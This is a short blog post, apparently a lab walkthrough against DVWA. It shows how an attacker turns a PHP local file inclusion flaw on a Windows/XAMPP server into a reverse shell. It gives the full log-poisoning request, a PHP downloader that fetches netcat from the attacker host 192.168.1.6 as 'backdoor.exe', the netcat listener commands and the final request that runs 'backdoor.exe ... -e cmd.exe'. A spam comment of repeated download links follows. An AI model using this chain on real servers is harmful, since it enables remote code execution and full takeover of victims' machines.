PHP script downloader and Reverse Shell with Netcat



Let's say that your server has LFI vulnerability or the attacker could upload an evil php script on your web server. In this case i will explore the first condition which is LFI. Let's create a little more difficult scenario for attacker and something more secure for the victim :)
Webserver has Windows 7 machine + Xampp but has one small misconfiguration problem which can lead to a disastrous for a webserver. The admin forgot to disable those variables in php.ini file register_globals and allow_url and allow for an attacker to include a local or remote file into running php code.


Attacker send this code to webserver log file through Netcat






In victim's machine we can see how the previous request saved in log file





Now attacker visits victim's vulnerable web page with his browser





In linux webserver has this tools preinstalled wget,nc,sbd,ncat but what about windows?I leave as an exersice to you and make your own research about other ways which can give a reverse shell. Attacker wants to download netcat from his server and execute it. The following script downloads file from attacker's server

http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=echo+"<?php+$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_connect($socket,'192.168.1.6',8888);socket_recv($socket,$buf,29184,MSG_WAITALL);$file=fopen('backdoor.exe','wb');fwrite($file,$buf);socket_close($socket);?>"+>+downloader.php


Attacker uses netcat listener to upload his file but firstly uses upx to compress netcat.

nc -nlvp 8888 < nc.exe



Reverse Shell

After successful download it is time for attacker to execute his backdoor and get a remote shell. It setup a new listener in port 7777


Attacker's Box  -> nc -nlvp 7777



http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=cmd+/c+backdoor.exe+192.168.1.6+7777+-e+cmd.exe

Comments

  1. Php Script Er And Reverse Shell With Netcat >>>>> Download Now

    >>>>> Download Full

    Php Script Er And Reverse Shell With Netcat >>>>> Download LINK

    >>>>> Download Now

    Php Script Er And Reverse Shell With Netcat >>>>> Download Full

    >>>>> Download LINK F9

    ReplyDelete

Post a Comment

Popular posts from this blog

Basic Pivoting with Cobaltstrike and Metasploit

Hiding Data Using White Space (Steganography)

Unhide a Hidden GPO